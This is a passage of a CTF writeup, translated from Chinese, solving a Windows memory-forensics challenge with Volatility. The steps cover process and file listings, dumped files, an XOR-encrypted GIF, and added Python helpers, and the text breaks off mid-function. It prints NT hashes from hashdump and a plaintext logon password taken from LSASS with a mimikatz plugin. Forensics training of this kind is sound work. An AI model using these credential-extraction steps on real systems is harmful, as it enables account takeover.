    elif line == 'num_out':
        print(str(data.pop()) + ' ', end='')
    else:
        print('error!!!')
        sys.exit()

102 108 97 103 123 51 53 52 101 55 49 99 101 45 48 99 56 48 45 52 102 101 54 45 56 57 54 52 45 56 99 101 55 102 55 53 49 102 48 101 57 125

Decoding the decimal values as ASCII gives the flag:

flag{354e71ce-0c80-4fe6-8964-8ce7f751f0e9}

卡比卡比卡比 (Kirby Kirby Kirby)

❯ volatility -f 内存取证.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/Users/chenyi/Downloads/das10/卡比卡比卡比 /内存取证.raw)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf8000403c0a0L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff8000403dd00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2021-10-14 15:23:41 UTC+0000
Image local date and time : 2021-10-14 23:23:41 +0800
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 pslist
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa80024d0ae0 System 4 0 90 588 ------ 0 2021-01-29 15:43:48 UTC+0000
0xfffffa8002d6c820 smss.exe 244 4 3 29 ------ 0 2021-01-29 15:43:48 UTC+0000
0xfffffa800360b060 csrss.exe 332 320 9 539 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa8003791710 wininit.exe 384 320 3 77 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa800382e530 services.exe 484 384 8 214 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa800383cb30 lsass.exe 500 384 7 748 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa8003840b30 lsm.exe 508 384 11 141 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa80038cd670 svchost.exe 616 484 11 359 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa80038f4060 vmacthlp.exe 676 484 3 53 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa8003905b30 svchost.exe 720 484 8 308 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa800393c890 svchost.exe 796 484 23 599 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa8003975890 svchost.exe 856 484 24 472 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa800399f750 svchost.exe 884 484 30 953 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa8003a1f5f0 svchost.exe 272 484 17 716 0 0 2021-01-29 15:43:51 UTC+0000
0xfffffa8003a6fb30 svchost.exe 788 484 17 480 0 0 2021-01-29 15:43:51 UTC+0000
0xfffffa8003acc220 spoolsv.exe 1156 484 13 272 0 0 2021-01-29 15:43:51 UTC+0000
0xfffffa8003aea830 svchost.exe 1184 484 19 308 0 0 2021-01-29 15:43:51 UTC+0000
0xfffffa8003b7a060 svchost.exe 1280 484 23 314 0 0 2021-01-29 15:43:52 UTC+0000
0xfffffa8003bddb30 VGAuthService. 1340 484 3 86 0 0 2021-01-29 15:43:52 UTC+0000
0xfffffa8003c4c060 vmtoolsd.exe 1456 484 9 267 0 0 2021-01-29 15:43:52 UTC+0000
0xfffffa8003d3bb30 svchost.exe 1632 484 6 93 0 0 2021-01-29 15:43:52 UTC+0000
0xfffffa8003d3e2f0 dllhost.exe 1832 484 13 185 0 0 2021-01-29 15:43:53 UTC+0000
0xfffffa80037ad960 msdtc.exe 1944 484 12 144 0 0 2021-01-29 15:43:53 UTC+0000
0xfffffa8003d6cb30 WmiPrvSE.exe 1332 616 10 202 0 0 2021-01-29 15:43:54 UTC+0000
0xfffffa800402f060 SearchIndexer. 2788 484 13 780 0 0 2021-01-29 15:45:26 UTC+0000
0xfffffa8003d9fb30 wmpnetwk.exe 2916 484 17 468 0 0 2021-01-29 15:45:26 UTC+0000
0xfffffa800416f060 svchost.exe 1444 484 5 270 0 0 2021-01-29 15:45:27 UTC+0000
0xfffffa8003f25b30 sppsvc.exe 1404 484 6 151 0 0 2021-01-29 15:45:52 UTC+0000
0xfffffa800406eb30 svchost.exe 2892 484 14 321 0 0 2021-01-29 15:45:53 UTC+0000
0xfffffa80037f8920 csrss.exe 2648 3880 9 356 2 0 2021-10-14 14:22:27 UTC+0000
0xfffffa8004136060 winlogon.exe 2972 3880 5 116 2 0 2021-10-14 14:22:27 UTC+0000
0xfffffa8003c743f0 taskhost.exe 3760 484 9 230 2 0 2021-10-14 14:22:43 UTC+0000
0xfffffa8004333b30 dwm.exe 2824 856 5 297 2 0 2021-10-14 14:22:45 UTC+0000
0xfffffa800397d530 explorer.exe 3928 3800 79 1908 2 0 2021-10-14 14:22:45 UTC+0000
0xfffffa8003f9e530 vmtoolsd.exe 3952 3928 8 196 2 0 2021-10-14 14:22:46 UTC+0000
0xfffffa8002b86b30 iexplore.exe 2136 3928 18 676 2 1 2021-10-14 14:26:53 UTC+0000
0xfffffa8002adc940 iexplore.exe 1672 2136 18 603 2 1 2021-10-14 14:26:53 UTC+0000
0xfffffa80042adb30 iexplore.exe 2360 2136 18 440 2 1 2021-10-14 14:27:48 UTC+0000
0xfffffa8004106b30 cmd.exe 3560 3928 1 19 2 0 2021-10-14 14:42:29 UTC+0000
0xfffffa800423f950 conhost.exe 3224 2648 2 58 2 0 2021-10-14 14:42:29 UTC+0000
0xfffffa8003f32060 audiodg.exe 3892 796 6 136 0 0 2021-10-14 15:16:26 UTC+0000
0xfffffa80039a2b30 dllhost.exe 3540 616 17 233 2 0 2021-10-14 15:20:04 UTC+0000
0xfffffa8003d79b30 dllhost.exe 2964 616 6 85 2 0 2021-10-14 15:23:41 UTC+0000
0xfffffa8003fe18a0 dllhost.exe 2752 616 6 82 0 0 2021-10-14 15:23:41 UTC+0000
0xfffffa80037ae950 DumpIt.exe 3700 3928 1 25 2 1 2021-10-14 15:23:41 UTC+0000
0xfffffa8003e9e7d0 conhost.exe 3860 2648 2 58 2 0 2021-10-14 15:23:41 UTC+0000
0xfffffa80042c2b30 dllhost.exe 3752 616 6 91 ------ 0 2021-10-14 15:23:42 UTC+0000
0xfffffa8004e23990 VMwareResoluti 3544 1456 1 416...81 2 0 2021-10-14 15:23:43 UTC+0000
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 pstree
Volatility Foundation Volatility Framework 2.6
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0xfffffa8003791710:wininit.exe 384 320 3 77 2021-01-29 15:43:49 UTC+0000
. 0xfffffa800383cb30:lsass.exe 500 384 7 748 2021-01-29 15:43:49 UTC+0000
. 0xfffffa800382e530:services.exe 484 384 8 214 2021-01-29 15:43:49 UTC+0000
.. 0xfffffa8003b7a060:svchost.exe 1280 484 23 314 2021-01-29 15:43:52 UTC+0000
.. 0xfffffa8003acc220:spoolsv.exe 1156 484 13 272 2021-01-29 15:43:51 UTC+0000
.. 0xfffffa8003d9fb30:wmpnetwk.exe 2916 484 17 468 2021-01-29 15:45:26 UTC+0000
.. 0xfffffa8003a1f5f0:svchost.exe 272 484 17 716 2021-01-29 15:43:51 UTC+0000
.. 0xfffffa8003a6fb30:svchost.exe 788 484 17 480 2021-01-29 15:43:51 UTC+0000
.. 0xfffffa80037ad960:msdtc.exe 1944 484 12 144 2021-01-29 15:43:53 UTC+0000
.. 0xfffffa800393c890:svchost.exe 796 484 23 599 2021-01-29 15:43:50 UTC+0000
... 0xfffffa8003f32060:audiodg.exe 3892 796 6 136 2021-10-14 15:16:26 UTC+0000
.. 0xfffffa800399f750:svchost.exe 884 484 30 953 2021-01-29 15:43:50 UTC+0000
.. 0xfffffa8003aea830:svchost.exe 1184 484 19 308 2021-01-29 15:43:51 UTC+0000
.. 0xfffffa8003c743f0:taskhost.exe 3760 484 9 230 2021-10-14 14:22:43 UTC+0000
.. 0xfffffa80038f4060:vmacthlp.exe 676 484 3 53 2021-01-29 15:43:50 UTC+0000
.. 0xfffffa8003d3e2f0:dllhost.exe 1832 484 13 185 2021-01-29 15:43:53 UTC+0000
.. 0xfffffa8003c4c060:vmtoolsd.exe 1456 484 9 267 2021-01-29 15:43:52 UTC+0000
... 0xfffffa8004e23990:VMwareResoluti 3544 1456 1 41...1 2021-10-14 15:23:43 UTC+0000
.. 0xfffffa8003bddb30:VGAuthService. 1340 484 3 86 2021-01-29 15:43:52 UTC+0000
.. 0xfffffa800406eb30:svchost.exe 2892 484 14 321 2021-01-29 15:45:53 UTC+0000
.. 0xfffffa8003905b30:svchost.exe 720 484 8 308 2021-01-29 15:43:50 UTC+0000
.. 0xfffffa8003975890:svchost.exe 856 484 24 472 2021-01-29 15:43:50 UTC+0000
... 0xfffffa8004333b30:dwm.exe 2824 856 5 297 2021-10-14 14:22:45 UTC+0000
.. 0xfffffa800402f060:SearchIndexer. 2788 484 13 780 2021-01-29 15:45:26 UTC+0000
.. 0xfffffa8003d3bb30:svchost.exe 1632 484 6 93 2021-01-29 15:43:52 UTC+0000
.. 0xfffffa80038cd670:svchost.exe 616 484 11 359 2021-01-29 15:43:50 UTC+0000
... 0xfffffa80042c2b30:dllhost.exe 3752 616 6 91 2021-10-14 15:23:42 UTC+0000
... 0xfffffa8003d6cb30:WmiPrvSE.exe 1332 616 10 202 2021-01-29 15:43:54 UTC+0000
... 0xfffffa8003fe18a0:dllhost.exe 2752 616 6 82 2021-10-14 15:23:41 UTC+0000
... 0xfffffa80039a2b30:dllhost.exe 3540 616 17 233 2021-10-14 15:20:04 UTC+0000
... 0xfffffa8003d79b30:dllhost.exe 2964 616 6 85 2021-10-14 15:23:41 UTC+0000
.. 0xfffffa8003f25b30:sppsvc.exe 1404 484 6 151 2021-01-29 15:45:52 UTC+0000
.. 0xfffffa800416f060:svchost.exe 1444 484 5 270 2021-01-29 15:45:27 UTC+0000
. 0xfffffa8003840b30:lsm.exe 508 384 11 141 2021-01-29 15:43:49 UTC+0000
0xfffffa800360b060:csrss.exe 332 320 9 539 2021-01-29 15:43:49 UTC+0000
0xfffffa80037f8920:csrss.exe 2648 3880 9 356 2021-10-14 14:22:27 UTC+0000
. 0xfffffa800423f950:conhost.exe 3224 2648 2 58 2021-10-14 14:42:29 UTC+0000
. 0xfffffa8003e9e7d0:conhost.exe 3860 2648 2 58 2021-10-14 15:23:41 UTC+0000
0xfffffa8004136060:winlogon.exe 2972 3880 5 116 2021-10-14 14:22:27 UTC+0000
0xfffffa80024d0ae0:System 4 0 90 588 2021-01-29 15:43:48 UTC+0000
. 0xfffffa8002d6c820:smss.exe 244 4 3 29 2021-01-29 15:43:48 UTC+0000
0xfffffa800397d530:explorer.exe 3928 3800 79 1908 2021-10-14 14:22:45 UTC+0000
. 0xfffffa80037ae950:DumpIt.exe 3700 3928 1 25 2021-10-14 15:23:41 UTC+0000
. 0xfffffa8003f9e530:vmtoolsd.exe 3952 3928 8 196 2021-10-14 14:22:46 UTC+0000
. 0xfffffa8004106b30:cmd.exe 3560 3928 1 19 2021-10-14 14:42:29 UTC+0000
. 0xfffffa8002b86b30:iexplore.exe 2136 3928 18 676 2021-10-14 14:26:53 UTC+0000
.. 0xfffffa8002adc940:iexplore.exe 1672 2136 18 603 2021-10-14 14:26:53 UTC+0000
.. 0xfffffa80042adb30:iexplore.exe 2360 2136 18 440 2021-10-14 14:27:48 UTC+0000
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 psscan
Volatility Foundation Volatility Framework 2.6
Offset(P) Name PID PPID PDB Time created Time exited
------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------
0x000000003cc2a990 VMwareResoluti 3544 1456 0x000000003ca08000 2021-10-14 15:23:43 UTC+0000
0x000000003e03f950 conhost.exe 3224 2648 0x0000000001ce7000 2021-10-14 14:42:29 UTC+0000
0x000000003e06db30 SearchFilterHo 328 2788 0x0000000019a93000 2021-10-14 15:07:27 UTC+0000 2021-10-14 15:08:34 UTC+0000
0x000000003e0adb30 iexplore.exe 2360 2136 0x000000002cb9c000 2021-10-14 14:27:48 UTC+0000
0x000000003e0c2b30 dllhost.exe 3752 616 0x00000000220c3000 2021-10-14 15:23:42 UTC+0000
0x000000003e133b30 dwm.exe 2824 856 0x0000000000c9e000 2021-10-14 14:22:45 UTC+0000
0x000000003e22f060 SearchIndexer. 2788 484 0x0000000002265000 2021-01-29 15:45:26 UTC+0000
0x000000003e26eb30 svchost.exe 2892 484 0x000000002daa9000 2021-01-29 15:45:53 UTC+0000
0x000000003e306b30 cmd.exe 3560 3928 0x000000002f90e000 2021-10-14 14:42:29 UTC+0000
0x000000003e336060 winlogon.exe 2972 3880 0x000000000546e000 2021-10-14 14:22:27 UTC+0000
0x000000003e36f060 svchost.exe 1444 484 0x000000003a216000 2021-01-29 15:45:27 UTC+0000
0x000000003e49e7d0 conhost.exe 3860 2648 0x000000003d0fe000 2021-10-14 15:23:41 UTC+0000
0x000000003e525b30 sppsvc.exe 1404 484 0x000000002c561000 2021-01-29 15:45:52 UTC+0000
0x000000003e532060 audiodg.exe 3892 796 0x0000000034578000 2021-10-14 15:16:26 UTC+0000
0x000000003e59e530 vmtoolsd.exe 3952 3928 0x000000002aba7000 2021-10-14 14:22:46 UTC+0000
0x000000003e5e18a0 dllhost.exe 2752 616 0x000000003dad8000 2021-10-14 15:23:41 UTC+0000
0x000000003e64c060 vmtoolsd.exe 1456 484 0x0000000007aa7000 2021-01-29 15:43:52 UTC+0000
0x000000003e6743f0 taskhost.exe 3760 484 0x000000003256d000 2021-10-14 14:22:43 UTC+0000
0x000000003e73bb30 svchost.exe 1632 484 0x0000000000ec6000 2021-01-29 15:43:52 UTC+0000
0x000000003e73e2f0 dllhost.exe 1832 484 0x000000003b954000 2021-01-29 15:43:53 UTC+0000
0x000000003e76cb30 WmiPrvSE.exe 1332 616 0x0000000033d5d000 2021-01-29 15:43:54 UTC+0000
0x000000003e779b30 dllhost.exe 2964 616 0x0000000028274000 2021-10-14 15:23:41 UTC+0000
0x000000003e79fb30 wmpnetwk.exe 2916 484 0x000000003ae0b000 2021-01-29 15:45:26 UTC+0000
0x000000003e81f5f0 svchost.exe 272 484 0x000000000f2e1000 2021-01-29 15:43:51 UTC+0000
0x000000003e86fb30 svchost.exe 788 484 0x000000000ab6e000 2021-01-29 15:43:51 UTC+0000
0x000000003e8cc220 spoolsv.exe 1156 484 0x00000000096cc000 2021-01-29 15:43:51 UTC+0000
0x000000003e8ea830 svchost.exe 1184 484 0x0000000009475000 2021-01-29 15:43:51 UTC+0000
0x000000003e97a060 svchost.exe 1280 484 0x000000000841b000 2021-01-29 15:43:52 UTC+0000
0x000000003e9ddb30 VGAuthService. 1340 484 0x0000000008121000 2021-01-29 15:43:52 UTC+0000
0x000000003ea2e530 services.exe 484 384 0x0000000013624000 2021-01-29 15:43:49 UTC+0000
0x000000003ea3cb30 lsass.exe 500 384 0x000000001344c000 2021-01-29 15:43:49 UTC+0000
0x000000003ea40b30 lsm.exe 508 384 0x0000000013414000 2021-01-29 15:43:49 UTC+0000
0x000000003eacd670 svchost.exe 616 484 0x0000000012a33000 2021-01-29 15:43:50 UTC+0000
0x000000003eaf4060 vmacthlp.exe 676 484 0x000000001272d000 2021-01-29 15:43:50 UTC+0000
0x000000003eb05b30 svchost.exe 720 484 0x0000000012735000 2021-01-29 15:43:50 UTC+0000
0x000000003eb3c890 svchost.exe 796 484 0x0000000012501000 2021-01-29 15:43:50 UTC+0000
0x000000003eb75890 svchost.exe 856 484 0x0000000011f4a000 2021-01-29 15:43:50 UTC+0000
0x000000003eb7d530 explorer.exe 3928 3800 0x0000000002fdf000 2021-10-14 14:22:45 UTC+0000
0x000000003eb9f750 svchost.exe 884 484 0x0000000011f53000 2021-01-29 15:43:50 UTC+0000
0x000000003eba2b30 dllhost.exe 3540 616 0x0000000024d2f000 2021-10-14 15:20:04 UTC+0000
0x000000003ebb23e0 dllhost.exe 2688 616 0x00000000302bf000 2021-10-14 15:23:30 UTC+0000 2021-10-14 15:23:39 UTC+0000
0x000000003ec0b060 csrss.exe 332 320 0x0000000016431000 2021-01-29 15:43:49 UTC+0000
0x000000003ed91710 wininit.exe 384 320 0x0000000015db7000 2021-01-29 15:43:49 UTC+0000
0x000000003edad960 msdtc.exe 1944 484 0x000000000389a000 2021-01-29 15:43:53 UTC+0000
0x000000003edae950 DumpIt.exe 3700 3928 0x000000003b639000 2021-10-14 15:23:41 UTC+0000
0x000000003edf8920 csrss.exe 2648 3880 0x000000001bc29000 2021-10-14 14:22:27 UTC+0000
0x000000003f76c820 smss.exe 244 4 0x000000001c79b000 2021-01-29 15:43:48 UTC+0000
0x000000003f8dc940 iexplore.exe 1672 2136 0x0000000036c6f000 2021-10-14 14:26:53 UTC+0000
0x000000003f940a10 SearchProtocol 2500 2788 0x0000000019895000 2021-10-14 15:20:42 UTC+0000 2021-10-14 15:21:46 UTC+0000
0x000000003f986b30 iexplore.exe 2136 3928 0x000000003a31d000 2021-10-14 14:26:53 UTC+0000
0x000000003ff0fae0 System 4 0 0x0000000000187000 2021-01-29 15:43:48 UTC+0000

# Check the IE history (iehistory also picks up explorer.exe's file:// entries)
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 iehistory
Volatility Foundation Volatility Framework 2.6
**************************************************
Process: 3928 explorer.exe
Cache type "DEST" at 0x154869c9
Last modified: 2021-10-14 23:23:17 UTC+0000
Last accessed: 2021-10-14 15:23:18 UTC+0000
URL: qiyue@file:///C:/Program%20Files%20(x86)/MSBuild/key.png
**************************************************
Process: 3928 explorer.exe
Cache type "DEST" at 0x154869c9
Last modified: 2021-10-14 23:23:17 UTC+0000
Last accessed: 2021-10-14 15:23:18 UTC+0000
URL: qiyue@file:///C:/Program%20Files%20(x86)/MSBuild/key.png
**************************************************
Process: 1672 iexplore.exe
Cache type "DEST" at 0x5dc63c9
Last modified: 2021-10-14 22:35:42 UTC+0000
Last accessed: 2021-10-14 14:35:44 UTC+0000
URL: qiyue@http://cn.bing.com/search?q=%E5%9C%A8%E6%96%87%E4%BB%B6%E5%90%8D%E5%89%8D%E5%8A%A0%E4%B8%80%E4%B8%AA%E5%89%8D%E7%BC%80&form=PRCNZH&ocid=iehp&httpsmsn=1&msnews=1&refig=e629761cdada4269b19f274534c67bed
Title: (WeNTMRRN*NMR - VQHr Bing
**************************************************
Process: 1672 iexplore.exe
Cache type "DEST" at 0x5dcf5f9
Last modified: 2021-10-14 23:20:33 UTC+0000
Last accessed: 2021-10-14 15:20:34 UTC+0000
URL: qiyue@http://cn.bing.com/search?q=%E6%80%8E%E6%A0%B7%E8%AE%BE%E7%BD%AE%E6%96%87%E4%BB%B6%E5%90%8D%E8%83%BD%E5%A4%9F%E6%9B%B4%E5%AE%89%E5%85%A8%2C%E4%B8%8D%E8%A2%AB%E5%8F%91%E7%8E%B0&qs=ds&form=QBRE
Title: `7hneNTYf[hQ,NSs - VQHr Bing
**************************************************
Process: 1672 iexplore.exe
Cache type "DEST" at 0x75c4721
Last modified: 2021-10-14 23:17:25 UTC+0000
Last accessed: 2021-10-14 15:17:26 UTC+0000
URL: qiyue@http://cn.bing.com/search?q=%E6%80%8E%E6%A0%B7%E8%AE%BE%E7%BD%AE%E6%96%87%E4%BB%B6%E5%90%8D%E8%83%BD%E5%A4%9F%E6%9B%B4%E5%AE%89%E5%85%A

# Hints: the two Bing queries, URL-decoded, read
# URL: qiyue@http://cn.bing.com/search?q=在文件名前加一个前缀&form=PRCNZH&ocid=iehp&httpsmsn=1&msnews=1&refig=e629761cdada4269b19f274534c67bed
#   ("add a prefix to the file name")
# URL: qiyue@http://cn.bing.com/search?q=怎样设置文件名能够更安全,不被发现&qs=ds&form=QBRE
#   ("how to name a file so that it is safer and not discovered")
# Search for key.png in the cached file objects and dump it

❯ volatility -f 内存取证.raw --profile=Win7SP1x64 filescan | grep key.png
Volatility Foundation Volatility Framework 2.6
0x000000003e5e94c0 1 0 R--rwd \Device\HarddiskVolume2\Program Files (x86)\MSBuild\key.png
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e5e94c0 --dump-dir=./
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3e5e94c0 None \Device\HarddiskVolume2\Program Files (x86)\MSBuild\key.png
❯ cat file.None.0xfffffa800420e870.dat | iconv -f GBK -t UTF-8
I remember saving a really good video, but now I can't find it. Could it be in the default folder?%

# Following that hint, search for Video; the suspicious entry is Users\Public\Videos\ohhhh, dump it

❯ volatility -f 内存取证.raw --profile=Win7SP1x64 filescan | grep Video
Volatility Foundation Volatility Framework 2.6
0x000000003e002070 2 1 R--rwd \Device\HarddiskVolume2\Users\Public\Videos
0x000000003e002b70 1 1 R--rwd \Device\HarddiskVolume2\Users\Public\Videos
0x000000003e0033d0 2 1 R--rwd \Device\HarddiskVolume2\Users\qiyue\Videos
0x000000003e003520 2 1 R--rwd \Device\HarddiskVolume2\Users\qiyue\Videos
0x000000003e248a90 1 0 R--r-- \Device\HarddiskVolume2\Users\Public\Videos\ohhhh
0x000000003e300070 2 1 R--rwd \Device\HarddiskVolume2\Users\Public\Videos
0x000000003e40de30 1 0 R--rwd \Device\HarddiskVolume2\Users\Public\Videos\desktop.ini
0x000000003e5a5b40 1 0 R--rwd \Device\HarddiskVolume2\Users\Public\Videos\Sample Videos\desktop.ini
0x000000003ebdfdc0 2 1 R--rwd \Device\HarddiskVolume2\Users\Public\Videos
0x000000003f94ebc0 1 0 R--rwd \Device\HarddiskVolume2\Users\qiyue\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e248a90 --dump-dir=./
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3e248a90 None \Device\HarddiskVolume2\Users\Public\Videos\ohhhh
❯ cat file.None.0xfffffa80039c1d60.dat
xzkbyyds!%

# Check the cmd.exe console history: 5201314 was typed

❯ volatility -f 内存取证.raw --profile=Win7SP1x64 cmdscan
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 3224
CommandHistory: 0xbfde0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 1 LastAdded: 0 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0xac810: 5201314
Cmd #37 @ 0xb61c0:

Cmd #38 @ 0x40158:

**************************************************
CommandProcess: conhost.exe Pid: 3860
CommandHistory: 0xffde0 Application: DumpIt.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c

# Search the file objects for 5201314 and dump the hit; file(1) identifies it as a zip archive

❯ volatility -f 内存取证.raw --profile=Win7SP1x64 filescan | grep 5201314
Volatility Foundation Volatility Framework 2.6
0x000000003e6e03c0 1 0 R--r-- \Device\HarddiskVolume2\Users\Public\Documents\5201314tips
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e6e03c0 --dump-dir=./
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3e6e03c0 None \Device\HarddiskVolume2\Users\Public\Documents\5201314tips
❯ file file.None.0xfffffa80038c54f0.dat
file.None.0xfffffa80038c54f0.dat: Zip archive data, at least v2.0 to extract
❯ cp file.None.0xfffffa80038c54f0.dat tips.zip

# The key from ohhhh (xzkbyyds!) is not the zip password, so go after the user's logon password instead. hashdump gives qiyue's NT hash 10961c67822ee59af54bdc9e91f2801f, which did not crack (31d6cfe0d16ae931b73c59d7e0c089c0 for Administrator and Guest is simply the NT hash of an empty password). Windows 7 still keeps the WDigest plaintext in LSASS, so Volatility 2 (Python 2) with the third-party mimikatz plugin (requires the construct module) recovers the password MahouShoujoYyds.
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 printkey -K "SAM\Domains\Account\Users\Names"
Volatility Foundation Volatility Framework 2.6
Legend: (S) = Stable (V) = Volatile

----------------------------
Registry: \SystemRoot\System32\Config\SAM
Key name: Names (S)
Last updated: 2020-10-28 12:50:29 UTC+0000

Subkeys:
(S) Administrator
(S) Guest
(S) HomeGroupUser$
(S) qiyue

Values:
REG_DWORD : (S) 0
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
qiyue:1001:aad3b435b51404eeaad3b435b51404ee:10961c67822ee59af54bdc9e91f2801f:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:84f851a4a47f1a1c9408b7e1ab7b469e:::
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 mimikatz
Volatility Foundation Volatility Framework 2.6
Module User Domain Password
-------- ---------------- ---------------- ----------------------------------------
wdigest qiyue qiyue-PC MahouShoujoYyds
wdigest QIYUE-PC$ WORKGROUP

# Decrypt: unzip tips.zip with that password

Archive: tips.zip
inflating: exp
❯ cat exp
import struct
key = 'xxxxxxxxx'
fp = open('!@#$importance', 'rb')
fs = open('!@#$unimportance', 'wb')
data = fp.read()
for i in range(0, len(data)):
result = struct.pack('B', data[i] ^ ord(*key[i % len(key)]))
fs.write(result)
fp.close()
fs.close()

# XOR is its own inverse, so reuse exp with the file roles swapped and xzkbyyds! as the key; the recovered file is a GIF

❯ cat s.py
import struct
key = 'xzkbyyds!'
fp = open('!@#$importance', 'wb')
fs = open('!@#$unimportance', 'rb')
data = fs.read()
for i in range(0, len(data)):
result = struct.pack('B', data[i] ^ ord(*key[i % len(key)]))
fp.write(result)
fp.close()
fs.close()
❯ python3 s.py
❯ file \!@\#\$importance
!@#$importance: GIF image data, version 89a, 119 x 103
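The writeup's s.py is exp with the two file roles swapped, which works because repeating-key XOR is its own inverse. The following is an added example, not part of the original writeup, that makes the recovery reusable and adds the check a practitioner would run if the key had not been lying around in ohhhh: the plaintext is known to start with the GIF89a signature, so XORing those six ciphertext bytes against the signature returns the first six key bytes directly (a known-plaintext attack on repeating-key XOR). The key value and file names come from the writeup; the sample bytes used in the test are constructed.

```python
import sys
from itertools import cycle

KEY_FROM_OHHHH = b"xzkbyyds!"   # key recovered from the 'ohhhh' file in the writeup
GIF_MAGIC = b"GIF89a"           # known plaintext: every GIF89a file starts with this


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The same call encrypts and decrypts (x ^ k ^ k == x)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key_prefix(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ct[i] ^ pt[i] == key[i % len(key)].

    With only the 6-byte GIF signature known you get the first 6 key bytes;
    any remaining key bytes must come from more known structure or brute force.
    """
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def recover_file(enc_path: str, out_path: str, key: bytes) -> bool:
    """Decrypt enc_path into out_path; return True if the result looks like a GIF."""
    with open(enc_path, "rb") as fp:
        data = fp.read()
    plain = xor_with_key(data, key)
    with open(out_path, "wb") as fs:
        fs.write(plain)
    return plain[:len(GIF_MAGIC)] == GIF_MAGIC


if __name__ == "__main__":
    # usage: python3 xor_recover.py '!@#$unimportance' '!@#$importance'
    enc, out = sys.argv[1], sys.argv[2]
    with open(enc, "rb") as fp:
        head = fp.read(len(GIF_MAGIC))
    print("key bytes implied by the GIF89a header:", recover_key_prefix(head, GIF_MAGIC))
    print("decrypted to a GIF:", recover_file(enc, out, KEY_FROM_OHHHH))
```

With the writeup's files the header check prints `b'xzkbyy'`, the first six bytes of `xzkbyyds!`; the last three key bytes line up with the GIF width/height fields, which are not known in advance, so without the hint they would have to be brute-forced (2^24 candidates, scored against the GIF block structure).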

Patch the GIF's height field so the full frames are shown; the flag is in frame 105.
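What "patch the height" means at the byte level, as an added example that is not from the original writeup: the GIF logical screen size sits in bytes 6..9 of the header (two little-endian 16-bit values), while every frame carries its own image descriptor with its own offset and size. Viewers clip each frame to the logical screen, so rows of a frame that is taller than the screen are never drawn. The script below walks the block structure without decoding any pixels, lists every frame descriptor, and enlarges the logical screen to the largest frame extent. It assumes the hidden rows live in frames whose descriptor exceeds the screen; the two-frame GIF built in `_constructed_gif` is constructed for the demo and contains no real image data.

```python
import struct
import sys


def _skip_subblocks(data: bytes, pos: int) -> int:
    """Advance past a chain of length-prefixed sub-blocks ending in a 0x00 terminator."""
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def logical_screen(data: bytes):
    """(width, height) from the Logical Screen Descriptor at offset 6."""
    return struct.unpack_from("<HH", data, 6)


def gif_frames(data: bytes):
    """Yield (left, top, width, height) for every image descriptor in the file."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    flags = data[10]
    pos = 13
    if flags & 0x80:                               # global colour table present
        pos += 3 * (2 << (flags & 7))
    while pos < len(data):
        b = data[pos]
        if b == 0x3B:                              # trailer
            break
        if b == 0x21:                              # extension: label byte, then sub-blocks
            pos = _skip_subblocks(data, pos + 2)
        elif b == 0x2C:                            # image descriptor
            left, top, w, h, f = struct.unpack_from("<HHHHB", data, pos + 1)
            yield (left, top, w, h)
            pos += 10
            if f & 0x80:                           # local colour table
                pos += 3 * (2 << (f & 7))
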